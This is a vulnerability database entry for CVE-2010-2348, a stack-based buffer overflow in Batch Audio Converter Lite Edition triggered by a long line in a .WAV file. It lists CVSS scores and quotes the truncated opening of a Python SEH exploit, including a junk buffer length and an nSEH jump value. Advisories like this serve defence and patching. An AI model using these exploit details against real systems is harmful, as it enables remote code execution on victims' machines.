9.3
CVSSv2

CVE-2010-2348

Published: 21/06/2010 Updated: 17/08/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in Batch Audio Converter Lite Edition 1.0.0.0 and previous versions allows remote malicious users to execute arbitrary code via a long line in a .WAV file.

Vulnerable Product Search on Vulmon Subscribe to Product

freesoftwaretoolbox batch audio converter

Exploits

# Software Link: wwwfreesoftwaretoolboxcom/files/batchaudio_setupexe # Tested on: Windows XP SP2 # Type of Vuln: SEH # Code : bacon-exploitpy # Greetz: Otoy, Postnix, Jasakom Community, Kilurah, Gesang, dan wedus-wedus lainnya ^^ # Thanks: All OffSec member #!/usr/bin/python import struct junk = "A" * 4132 nseh = "\xeb\x06\x90\x90" se ...